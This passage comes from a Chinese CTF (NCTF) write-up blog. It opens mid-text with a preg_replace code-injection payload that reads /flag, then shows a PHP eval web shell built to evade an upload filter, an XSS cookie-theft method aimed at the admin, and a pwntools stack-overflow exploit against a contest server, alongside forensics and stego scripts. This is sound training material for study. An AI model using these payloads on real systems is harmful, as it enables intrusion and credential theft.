                                                                        sub=text&pat=e&rep=readfile(chr(47).chr(102).chr(108).chr(97).chr(103));
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15

                                                                        # 0x07 flask

                                                                        大佬队员,躺赢。。。。。

                                                                        # 0x08 Upload your Shell

                                                                        翻了一下网页就只有

                                                                        index.php?action=imgs.html
                                                                        
                                                                        1

                                                                        有注入点 然后想着上传一个图片马 直接写一句话改后缀名不行 看起来他是要读文件头的 并且拦截了<?(有时候正常的图片文件都会有。。。。。) 考虑php的第三种写法

                                                                        <script language="php"> 
                                                                        @eval($_POST[a]);
                                                                        </script>
                                                                        
                                                                        1
                                                                        2
                                                                        3

                                                                        刚准备用菜刀的结果告诉我一个服务器上自带的图片马的地址 用自带的action参数解析成php就完事了 payload:

                                                                        /index.php?action=/var/www/html/upload-imgs/321fab94ed3f1e1fba698ddda303566a/Th1s_is_a_fl4g.jpg
                                                                        
                                                                        1

                                                                        # 0x09 flask_website

                                                                        大佬队友带我躺赢。。。。。

                                                                        # 0x0A simple_xss

                                                                        据队友说是个入门向xss

                                                                        在http://xsspt.com/生成一段xss 发给admin

                                                                        过一会就会得到admin的cookie

                                                                        然后就能拿到flag......

                                                                        # 0x0B hacker_backdoor

                                                                        大佬队友带我躺赢。。。。。+2

                                                                        # 0x0C tsb

                                                                        tsb->bst .....

                                                                        # 0x0D 难看的代码

                                                                        大佬队友带我躺赢。。。。。+3

                                                                        # 0x0E 签到题

                                                                        大佬队友带我躺赢。。。。。+4

                                                                        # 0x0F DEBUG

                                                                        真就IDA 动态调试。。。。。

                                                                        因为

                                                                          for ( i = 0; i <= 23; ++i )
                                                                          {
                                                                            if ( v7[i] != *(&s + i) )
                                                                            {
                                                                              printf("GG");
                                                                              exit(0);
                                                                            }
                                                                          }
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8

                                                                        进循环时s就计算好了

                                                                        然后下个断点直接看栈就好了

                                                                        # 0x10 Our 16bit Games

                                                                        大佬队友带我躺赢。。。。。+5

                                                                        # 0x11 Easy Ternary

                                                                        大佬队友带我躺赢。。。。。+6

                                                                        # 0x12 你大概需要一个带bar的mac

                                                                        无设备引起不适。。。

                                                                        过

                                                                        # 0x13 math_easy

                                                                        math.....easy?...... 过.......

                                                                        # 0x14 hello_pwn

                                                                        nc 题。。。。。

                                                                        #coding=utf-8
                                                                        from pwn import *
                                                                        io=remote("139.129.76.65","50003")
                                                                        io.interactive()
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4

                                                                        # 0x15 pwn me 100 years! (I)

                                                                        checksec 看一下

                                                                            Arch:     amd64-64-little
                                                                            RELRO:    Partial RELRO
                                                                            Stack:    No canary found
                                                                            NX:       NX enabled
                                                                            PIE:      No PIE (0x400000)
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5

                                                                        没开Canary和PIE,

                                                                        要满足两个条件

                                                                        直接栈溢出就完事了

                                                                        #coding=utf-8
                                                                        from pwn import *
                                                                        payload="yes\x00"+'a'*(0x10-0x4)+p64(0x66666666)
                                                                        io=remote("139.129.76.65","50004")
                                                                        io.sendafter("ready?\n",payload)
                                                                        io.interactive()
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6

                                                                        # 0x16 pwn me 100 years! (II)

                                                                        漏洞:栈上变量未初始化导致第一个函数里的buf就是第二个函数的&dest

                                                                        然后可以用第二个函数的printf格式化漏洞

                                                                        但是checksec告诉我们

                                                                            Arch:     amd64-64-little
                                                                            RELRO:    Partial RELRO
                                                                            Stack:    Canary found
                                                                            NX:       NX enabled
                                                                            PIE:      PIE enabled
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5

                                                                        开了PIE....

                                                                        还得泄露基址。。

                                                                        最后没能整出来,还是要好好学。。。。。

                                                                        # 0x17 ~ 0x1C(pwn)

                                                                        0x17没做出来,心态爆炸。。。。。

                                                                        # 0x1D Keyboard

                                                                        九宫格输入法。。。。。。

                                                                        好像把所有不一样的表示换成不同字幕跑quipquip也能过。。。。。

                                                                        # 0x1E~0x21 (Crypto)

                                                                        我,数学学术垃圾,过.......

                                                                        # 0x22 a_good_idea

                                                                        foremost+stegsolve(image Combiner)

                                                                        得到一张二维码,扫描得到flag

                                                                        # 0x23 Become a Rockstar

                                                                        看文风有点奇怪。。。。像是编程语言。。。

                                                                        搜了一下有没有诗歌一样的编程语言

                                                                        发现Rockstar语言

                                                                        用Rockstar-js 没跑出来暂时放弃了

                                                                        结果Rockstar-py可以跑出来

                                                                        Leonard_Adleman = "star"
                                                                        Problem_Makers = 76
                                                                        Problem_Makers = "NCTF{"
                                                                        def God(World):
                                                                            a_boy = "flag"
                                                                            the_boy = 3
                                                                        def Evil(your_mind):
                                                                            a_girl = "no flag"
                                                                            the_girl = 5
                                                                        Truths = 3694
                                                                        Bob = "ar"
                                                                        Adi_Shamir = "rock"
                                                                        def Love(Alice, Bob):
                                                                            Mallory = 13
                                                                            Mallory = 24
                                                                        Everything = 114514
                                                                        Alice = "you"
                                                                        def Reality(God, Evil):
                                                                            God = 26
                                                                            Evil = 235
                                                                        Ron_Rivest = "nice"
                                                                        def You_Want_To(Alice, Love, Anything):
                                                                            You = 5.75428
                                                                        your_heart = input()
                                                                        You = 5
                                                                        your_mind = input()
                                                                        Nothing = 31
                                                                        if Truths * Nothing == Everything:
                                                                            RSA = Ron_Rivest + Adi_Shamir + Leonard_Adleman
                                                                        if Everything / Nothing == Truths:
                                                                            Problem_Makers = Problem_Makers + Alice + Bob
                                                                        print(Problem_Makers)
                                                                        the_flag = 245
                                                                        the_confusion = 244
                                                                        print(RSA)
                                                                        Mysterious_One = "}"
                                                                        print(Mysterious_One)
                                                                        This = 4
                                                                        This = 35
                                                                        This = 7
                                                                        This = 3
                                                                        This = 3
                                                                        This = 37
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16
                                                                        17
                                                                        18
                                                                        19
                                                                        20
                                                                        21
                                                                        22
                                                                        23
                                                                        24
                                                                        25
                                                                        26
                                                                        27
                                                                        28
                                                                        29
                                                                        30
                                                                        31
                                                                        32
                                                                        33
                                                                        34
                                                                        35
                                                                        36
                                                                        37
                                                                        38
                                                                        39
                                                                        40
                                                                        41
                                                                        42
                                                                        43

                                                                        # 0x24 Bright Body I

                                                                        虚幻引擎好游戏啊!(然而手残。。。。。

                                                                        巅峰极客Nijia留下的心理阴影

                                                                        以为要用逆向代码啥的

                                                                        结果最后是在pak里直接strings就能出来的题目。。。。。

                                                                        strings /mnt/c/Users/Eki/Desktop/Bright\ Body\ I/Bright\ Body\ I/Magic/Content/Paks/Magic-WindowsNoEditor.pak |grep NCTF*
                                                                        
                                                                        1

                                                                        # 0x25 有内鬼,终止交易

                                                                        一个ss协议流量分析题

                                                                        一、针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况:

                                                                        表达式为:ip.src == 192.168.0.1

                                                                        (2)对目的地址为192.168.0.1的包的过滤,即抓取目的地址满足要求的包。

                                                                        表达式为:ip.dst == 192.168.0.1

                                                                        (3)对源或者目的地址为192.168.0.1的包的过滤,即抓取满足源或者目的地址的ip地址是192.168.0.1的包。

                                                                        表达式为:ip.addr == 192.168.0.1,或者 ip.src == 192.168.0.1 or ip.dst == 192.168.0.1

                                                                        (4)要排除以上的数据包,我们只需要将其用括号囊括,然后使用 "!" 即可。

                                                                        表达式为:!(表达式)

                                                                        二、针对协议的过滤

                                                                        (1)仅仅需要捕获某种协议的数据包,表达式很简单仅仅需要把协议的名字输入即可。

                                                                        ​ 表达式为:http

                                                                        (2)需要捕获多种协议的数据包,也只需对协议进行逻辑组合即可。

                                                                        表达式为:http or telnet (多种协议加上逻辑符号的组合即可)

                                                                        (3)排除某种协议的数据包

                                                                        表达式为:not arp !tcp

                                                                        三、针对端口的过滤(视协议而定)

                                                                        (1)捕获某一端口的数据包

                                                                        表达式为:tcp.port == 80

                                                                        (2)捕获多端口的数据包,可以使用and来连接,下面是捕获高端口的表达式

                                                                        表达式为:udp.port >= 2048

                                                                        四、针对长度和内容的过滤

                                                                        (1)针对长度的过虑(这里的长度指定的是数据段的长度)

                                                                        表达式为:udp.length < 30 http.content_length <=20

                                                                        (2)针对数据包内容的过滤

                                                                        表达式为:http.request.uri matches "vipscu" (匹配http请求中含有vipscu字段的请求信息)

                                                                        config.json泄露了加密方法、密钥和主机地址

                                                                        用ss的源码里的脚本直接跑解密

                                                                        人肉分析了半个下午,心态爆炸。。。。。

                                                                        分析不出来,

                                                                        由于客户端和服务端发送包都经过了加密,不能整个导出进行解密,需分开解密

                                                                        ......

                                                                        最后找到是在这个TCP包里。。。

                                                                        # 0x26 小狗的秘密

                                                                        流量分析套路题

                                                                        用Wireshark导出HTTP对象

                                                                        最大的一个1.html里有很奇妙的东西类似

                                                                        (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255) (255, 255, 255).....
                                                                        
                                                                        1

                                                                        盲猜是RGB像素点,把格式改一下用下面的脚本导出图像

                                                                        #coding=utf-8
                                                                        from PIL import Image
                                                                        
                                                                        x = 500    #x坐标  通过对txt里的行数进行整数分
                                                                        y = 100    #y坐标  x * y = 行数
                                                                        
                                                                        im = Image.new("RGB", (x, y))
                                                                        file = open('1.html')
                                                                        
                                                                        for i in range(0, x):
                                                                            for j in range(0, y):
                                                                                line = file.readline()  #获取一行的rgb值
                                                                                rgb = line.split(", ")  #分离rgb,文本中逗号后面有空格
                                                                                im.putpixel((i, j), (int(rgb[0]), int(rgb[1]), int(rgb[2])))
                                                                        
                                                                        im.save('flag.jpg')
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4
                                                                        5
                                                                        6
                                                                        7
                                                                        8
                                                                        9
                                                                        10
                                                                        11
                                                                        12
                                                                        13
                                                                        14
                                                                        15
                                                                        16

                                                                        # 0x27 键盘侠

                                                                        下载一个zip伪加密

                                                                        里面一张大的不科学的图

                                                                        直接上foremost

                                                                        得到一个docx

                                                                        说是隐藏字符

                                                                        打开docx隐藏字符显示

                                                                        得到这么一串东西

                                                                        PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE

                                                                        想了很久。。

                                                                        甚至打开xml发现密文分三段。。。还有个hint:eastAsia

                                                                        以为是某种多表代换?

                                                                        最后也没做出来

                                                                        结果最后告诉我是个base85..........

                                                                        python3
                                                                        >>> import base64
                                                                        >>> base64.b85decode('PD4~idqQC|WjHloX>)UPb8~ZFb8laGczAeteE')
                                                                        b'NCTF{Ba3e85_issssss_so_xxxxx}'
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4

                                                                        # 0x28 What's this

                                                                        WireShark找到大文件点导出字节流存储为zip

                                                                        发现还是个伪加密

                                                                        里面一堆base64

                                                                        多行的解不出来,应该就是base64隐写了

                                                                        跑一下脚本就得到flag....

                                                                        (一开始可能复制错了结果没跑出来。。。。。)

                                                                        # 0x29 2077

                                                                        点开一看发现是2077的“官方”解密视频

                                                                        应该会有大佬解过

                                                                        所以Google Cyberpunk 2077 stream decode.

                                                                        然后找到一个帖子 https://www.reddit.com/r/pcgaming/comments/9an6mn/cd_projekt_red_twitch_live_with_cyberpunk_2077/ ,解密结果是一张图

                                                                        下载后用 sha256sum 命令求 sha256 值即可。

                                                                        # 0x2A pip install

                                                                        直接把pip 下下来的包拿来分析

                                                                        里面有一串神奇的编码。。。。

                                                                        tmp_file = tempfile.gettempdir() + path.sep + '.f14g_is_here'
                                                                        f = open(tmp_file, 'w')
                                                                        f.write('TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9')
                                                                        f.close()
                                                                        
                                                                        1
                                                                        2
                                                                        3
                                                                        4

                                                                        用base64就能解码出来

                                                                        编辑 (opens new window)
                                                                        上次更新: 2022/05/18, 16:49:51
                                                                        最近更新
                                                                        01
                                                                        QWB CTF2022 线下赛总决赛部分题解
                                                                        08-25
                                                                        02
                                                                        CISCN2022 总决赛部分题解
                                                                        08-25
                                                                        03
                                                                        DSCTF2022决赛 部分writeup
                                                                        08-08
                                                                        更多文章>
                                                                        Theme by Vdoing | Copyright © 2019-2022 EkiXu | Creative Commons License
                                                                        This work is licensed under a Creative Commons Attribution 4.0 International License.
                                                                        • 跟随系统
                                                                        • 浅色模式
                                                                        • 深色模式
                                                                        • 阅读模式